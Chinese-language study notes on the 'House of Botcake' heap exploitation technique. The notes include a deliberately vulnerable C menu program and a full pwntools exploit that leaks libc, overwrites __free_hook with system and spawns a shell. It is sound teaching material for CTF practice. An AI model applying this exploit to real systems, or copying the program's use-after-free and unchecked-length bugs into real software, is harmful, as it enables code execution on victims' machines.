【我的 PWN 学习手札】House of Botcake —— tcache key 绕过

参考自看雪课程：PWN探索篇

前言

我们知道，自对 tcachebin 添加了 key 进行了 double free 检查后，利用起来薛微有些困难。double free 绕过检查机制，实则是因为释放时会检查 tcachebin 对应 size 的所有 free chunk。那么如果第二次 free 的 chunk 落入到其他 tcachebin，或者 fastbin，就可以实现绕过。

放入 tcachebin 绕过 tcache key 实现的 double free：【我的 PWN 学习手札】House of Karui —— tcache key 绕过手法-CSDN博客 

放入其他 fastbin 绕过 tcache key 实现的 double free：【我的 PWN 学习手札】tcache stash with fastbin double free —— tcache key 绕过-CSDN博客

本篇博客则通过借助 unsortedbin 实现 tcache key 的检查绕过，实现 double free

一、House of Botcake

废话不多说，之切入主题

我们连续 malloc 9块大于 fastbin chunk 大小的堆块，然后释放7块填充 tcachebin

 然后释放chunk8、chunk9，会落入 unsortedbin 并进行合并

这时候我们将一块 0x100 大小的 chunk 申请出来，然后再 free 掉 chunk9

 ok，现在你可能发现已经构成了double free 了，只要我们申请不是 0x100 大小的 chunk，就会从 unsortedbin 中进行切割。因此我们实际上是可以分一次或多次，将 chunk9 的一部分或全部申请出来。

二、测试与模板

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>

char *chunk_list[0x100];

void menu() {
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

int get_num() {
    char buf[0x10];
    read(0, buf, sizeof(buf));
    return atoi(buf);
}

void add_chunk() {
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

void delete_chunk() {
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

void edit_chunk() {
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

void show_chunk() {
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        switch (get_num()) {
            case 1:
                add_chunk();
                break;
            case 2:
                delete_chunk();
                break;
            case 3:
                edit_chunk();
                break;
            case 4:
                show_chunk();
                break;
            case 5:
                exit(0);
            default:
                puts("invalid choice.");
        }
    }
}

from pwn import *
elf=ELF('./pwn')
libc=ELF('./libc.so.6')
context.arch=elf.arch
context.log_level='debug'

io=process('./pwn')
def add(index,size):
    io.sendlineafter(b'choice:\n',b'1')
    io.sendlineafter(b'index:\n',str(index).encode())
    io.sendlineafter(b'size:\n',str(size).encode())
def delete(index):
    io.sendlineafter(b'choice:\n',b'2')
    io.sendlineafter(b'index:\n',str(index).encode())
def edit(index,length,content):
    io.sendlineafter(b'choice:\n',b'3')
    io.sendlineafter(b'index',str(index).encode())
    io.sendlineafter(b'length:\n',str(length).encode())
    io.sendafter(b'content:\n',content)
def show(index):
    io.sendlineafter(b'choice:\n',b'4')
    io.sendlineafter(b'index:\n',str(index).encode())

gdb.attach(io)
# leak libc
add(0,0x410)
add(1,0x10)
delete(0)
show(0)
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x7591b55b6be0+0x7591b5200000
libc.address=libc_base
success(hex(libc_base))
add(0,0x410)

# house of botcake
for i in range(9):add(i,0x90)
add(10,0x10)
for i in range(7):delete(i)
delete(7)
delete(8)
add(0,0x90)
delete(8)
pause()
add(0,0x70)
pause()
add(0,0x40)
pause()
edit(0,0x28,p64(0)*2+p64(0xa0)*2+p64(libc.sym['__free_hook']))
add(0,0x90)
add(0,0x90)
edit(0,0x8,p64(libc.sym['system']))
edit(1,0x8,b'/bin/sh\x00')
delete(1)
io.interactive()